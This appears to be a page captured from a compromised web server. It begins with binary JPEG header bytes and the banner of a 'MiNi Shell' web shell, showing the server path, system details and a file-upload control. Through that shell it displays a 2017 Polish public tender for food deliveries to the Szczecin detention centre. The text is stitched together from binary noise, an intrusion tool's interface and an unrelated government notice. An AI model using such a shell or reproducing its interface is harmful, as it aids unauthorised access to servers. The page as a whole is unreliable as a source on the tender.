JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170414/67332-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sw.gov.pl' target='_blank'>http://www.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 67332 - 2017
              z dnia 2017-04-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szczecin: Sukcesywne dostawy art. ogólnospożywczych (przyprawy, koncentraty, sosy w proszku, wyroby sojowe), ryb, warzyw i dań mrożonych do Aresztu Śledczego w Szczecinie.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Areszt Śledczy, krajowy numer identyfikacyjny
              62648400000, ul.
              ul. Kaszubska 
              28,
              70-952  
              Szczecin, woj.
              zachodniopomorskie, państwo
              Polska, tel.
              91 4809100, 4809151, 52, e-mail
              as_szczecin@sw.gov.pl, faks
              914 809 260.
              <br />
              Adres strony internetowej (URL): www.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka organizacyna więziennictwa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Areszt Śledczy, ul. Kaszubska 28, 70-226 Szczecin</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywne dostawy art. ogólnospożywczych (przyprawy, koncentraty, sosy w proszku, wyroby sojowe), ryb, warzyw i dań mrożonych do Aresztu Śledczego w Szczecinie.<br /><b>Numer referencyjny: </b>D/Kw.2232.06.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>
1. Przedmiotem zamówienia są  sukcesywne dostawy art. ogólnospożywczych (przyprawy, koncentraty, sosy w proszku, wyroby sojowe), ryb, warzyw i dań mrożonych  do magazynu Aresztu Śledczego w Szczecinie.
 

Pakiet I (przyprawy, koncentraty, sosy w proszku, wyroby sojowe):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Przyprawa uniwersalna typu kucharek
kg
60
15871270-7
PN-EN 13188
2.
Przyprawa pięciu smaków (do potraw chińskich)
kg
20
15871270-7
PN-EN 13188
3.
Przyprawa do gyrosa
kg
20
15871270-7
PN-EN 13188
4.
Bazylia
kg
4
15872000-1
PN-A-86960
5.
Cynamon
kg
10
15872000-1
BN-68/8132-09
6.
Czosnek granulowany
kg
40
15871000-4
PN-A-86967
7.
Koper suszony
kg
15
15871000-4
PN-A-86967
8.
Kwasek cytrynowy
kg
20
15890000-3
PN-81/A-79734
9.
Liść laurowy
kg
15
15871000-4
PN-R-87022
10.
Gałka muszkatołowa
kg
10
15872300-4
PN-A-86955:1:1997
11.
Ziele angielskie
kg
20
15870000-7
BN-648132-14
12.
Przyprawa goździki
kg
2
15870000-7
PN-A-86967
13.
Majeranek
kg
40
15872000-1
PN-A-86958
14.
Musztarda butelka lub słoik
kg
150
15871250-1
PN-A-86964
15.
Ocet
l
60
15871120-1
PN-72/A-79733
16.
Pieprz czarny mielony
kg
60
15872100-2
PN-A-86965
17.
Zioła prowansalskie
kg
10
15872000-1
PN-A-86960
18.
Papryka mielona ostra
kg
60
15871000-4
PN-A-86955
19.
Sól spożywcza
kg
1200
15872400-5
PN-C-84081-2
20.
Soda oczyszczona spożywcza
kg
10
15890000-3
PN-EN 13188
20.
Herbata granulowana
kg
400
15863000-5
PN-ISO 3720

21.
Przyprawa do zup w płynie
l
1800
15890000-3
PN-A-94052
22.
Oregano
kg
6
15872000-1
PN-A-86960
23.
Curry
kg
4
15871200-6
PN-R-87022
24.
Rosół drobiowy w proszku (baza)
kg
80
15891400-4
PN-A-97052
25.
Żurek w proszku (baza)
kg
80
15891400-4
PN-A-94050
26.
Sos pieczarkowy w proszku
kg
100
15871260-4
PN-A-86951
27.
Sos pieczeniowy ciemny w proszku
kg
60
15871260-4
PN-A-86951
28.
Zupa ogonowa w proszku
kg
60
15891400-4
PN-A-94050
29.
Barszcz biały w proszku
kg
60
15871260-4
PN-A-86951
30.
Barszcz czerwony w proszku
kg
60
15871260-4
PN-A-86951
31.
Sos boloński
kg
50
15871260-4
PN-A-86951
32.
Soja (granulat)
kg
300
15890000-3
PN-ISO 5506
33.
Soja (kostka 06)
kg
350
15890000-3
PN-ISO 5506
34.
Kotlety sojowe schabowe
kg
100
15890000-3
PN-ISO 5506
35.
Ketchup butelka lub słoik
kg
200
15871230-5
PN-A-82013:1996
36.
Majonez butelka lub słoik
kg
200
15871273-8
PN-A-86950:1995
37.
Chrzan słoik
kg
100
15331400-1
PN/R-75520
38.
Woda mineralna niegazowana 
(but. 1,5l)
l
9000
15981000-8
PN-Z-11001-2
39.
Koncentrat pomidorowy puszka 30%
kg
1500
15331427-6
PN-75/A-77601
40.
Szczaw (słoik) konserwowy
kg
200
15332170-6
PN-A-77807:1997
41.
Kukurydza konserwowa puszka lub słoik
kg
400
15331400-1
PN-A-77807
42.
Papryka konserwowa czerwona puszka lub słoik
kg
300
15331400-1
PN-PN/A-77806
43.
Groszek konserwowy puszka lub słoik
kg
300
15331400-1
PN-76/A-77803
44.
Fasola czerwona konserwowa słoik lub puszka
kg
150
15331400-1
PN-V-74016:2001






Pakiet II (ryby):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Filet z morszczuka / mintaja / miruny / dorsza (mrożony, ze skórą, rozmiar 100  200 g) 
kg
900
15222000-0
PN-A-86759
2.
Kostka z fileta z mintaja / morszczuka (mrożona)
kg
700
15221000-3
PN-75/A-86764
3.
Burgery rybne panierowane o wadze 1 szt ok. 100g (mrożone)
kg
1000
15229000-9
PN-A-86769
4.
Płaty ze śledzia (mrożone)
kg
200
15221000-3
PN-A-86759
5.
Płaty śledziowe w salinacie
kg
300
15233000-0
PN-92/A-86758
6.
Makrela wędzona o wadze 1 szt ok. 200g (tusza)
kg
100
15234000-7
PN-85/A-86772

Pakiet III (warzywa mrożone):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Mieszanka wieloskładnikowa mrożona
kg
800
15331170-9
PN-A-78602
2.
Mieszkanka 2-składnikowa marchew + groszek mrożona
kg
700
15331170-9
PN-A-78602
3.
Kalafior mrożony
kg
800
15331170-9
PN-A-78602
4.
Brokuł mrożony
kg
800
15331170-9
PN-A-78602
5.
Szpinak mrożony
kg
400
15331170-9
PN-A-78602
6.
Warzywa leczo mrożone
kg
300
15331170-9
PN-A-78602
7.
Pieczarki mrożone
kg
300
15331170-9
PN-A-78602
8.
Włoszczyzna w paski (bez warzyw kapustnych i strączkowych) mrożona
kg
700
15331170-9
PN-A-78602
9.
Mieszanka chińska mrożona
kg
300
15331170-9
PN-A-78602
10.
Mieszanka węgierska mrożona
kg
300
15331170-9
PN-A-78602
11.
Zupa grzybowa
kg
200
15331170-9
PN-A-78602
12.
Zupa barszcz ukraiński
kg
200
15331170-9
PN-A-78602
13.
Jagody mrożone
kg
200
15330000-0
PN-A-78652
14.
Truskawki mrożone
kg
400
15330000-0
PN-A-78652

Pakiet IV (dania mrożone):

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1.
Uszka z kapustą i grzybami mrożone
kg
50
15851000-8
PN-A-82201
2.
Pierogi z serem mrożone
kg
300
15851000-8
PN-A-82201
3.
Pierogi ruskie
kg
200
15851000-8
PN-A-82201
4.
Knedle z truskawkami
kg
300
15851000-8
PN-A-82201
Powyższe zestawienie oznacza kolejno: przedmiot zamówienia, zapotrzebowanie ilościowe, kod CPV wg Wspólnego Słownika Zamówień, Polską Normę.

1.   Podane w opisach nazwy własne nie mają na celu naruszenia art. 7 i 29 ustawy PZP, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne, tzn. posiadające cechy, właściwości, jakość, nie gorsze niż opisane w przedmiocie zamówienia. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.
2. Podane ilości poszczególnych produktów żywnościowych są ilościami szacunkowymi. Ilość dostarczanego Towaru może ulec pomniejszeniu o 30%. Wykonawcy przysługuje prawo do wynagrodzenia wyłącznie za faktycznie dostarczone ilości towaru. Ostateczny rozmiar zamówienia nie może stanowić podstaw do zgłaszania roszczeń z tytułu niezrealizowanych dostaw albo podstawy do odmowy realizacji dostaw.
2.   Przedmiot zamówienia musi być zgodny z Polskimi Normami i posiadać aktualny Handlowy Dokument Identyfikacyjny (HDI). Musi być wolny od wad i zanieczyszczeń, posiadać swoistą barwę, smak i zapach.  Wszystkie artykuły muszą posiadać termin przydatności do spożycia min do kolejnej dostawy. 
3.  Wykonawca przedmiot zamówienia musi dostarczać w zamkniętych, oryginalnych i nieuszkodzonych opakowaniach. Treść etykiet na opakowaniach winna zawierać informacje w języku polskim o nazwie i adresie producenta, o parametrach fizyko-chemicznych produktu oraz o dacie przydatności do spożycia  zgodnie z obowiązującymi przepisami prawa.
4. Zobowiązuje się wykonawcę do tego, aby jakość dostarczanych artykułów spożywczych, sposób ich pakowania, a także rodzaj używanych opakowań zbiorczych  z zastrzeżeniem określonym w szczegółowym opisie przedmiotu zamówienia oraz w stosowanych normach i powszechnie obowiązujących przepisach prawa powodowały obniżenie ponoszonych przez zamawiającego kosztów przechowywania, przygotowania i dystrybucji dostarczanych produktów i wytwarzanych z nich potraw oraz kosztów wywozu i utylizacji powstałych odpadów.
5.   Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze   umowy stanowiącym Załącznik nr 4 do SIWZ.
6.    Zamawiający dopuszcza możliwość składania ofert częściowych.
7.    Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
8.    Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 67 ust. 1 ustawy PZP.
9.  Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę następujących prac związanych z rozmieszczeniem i instalacją przedmiotu dostawy.
10.   Zamawiający nie wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia.
<br /><br /><b>II.5) Główny kod CPV: </b>15871270-7<br /><b> Dodatkowe kody CPV:</b>15222000-0,
                15331170-9,
                15851000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określił warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określił warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                za spełniających ten warunek Zamawiający uzna Wykonawców, którzy wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują dostawy w zakresie niezbędnym do potwierdzenia spełniania w/w warunku, przez co Zamawiający rozumie realizację w okresie trzech ostatnich lat przed upływem terminu składania ofert, minimum trzech dostaw odpowiadających swoim rodzajem dostawie stanowiącej przedmiot zamówienia. Jeżeli okres prowadzenia działalności jest krótszy, spełnienie niniejszego warunku powinno nastąpić w tym okresie. Wykonawcy muszą podać Zamawiającemu dane dotyczące zrealizowanych w tym okresie dostaw odpowiadających swoim zakresem przedmiotowi zamówienia ze wskazaniem przedmiotu, wartości, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane (w tym celu posłużyć może Załącznik nr 6) oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz wykonanych dostaw  Załącznik nr 6 wraz z referencjami lub innymi dokumentami potwierdzającymi, że wykazane dostawy zostały wykonane należycie wystawionymi przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
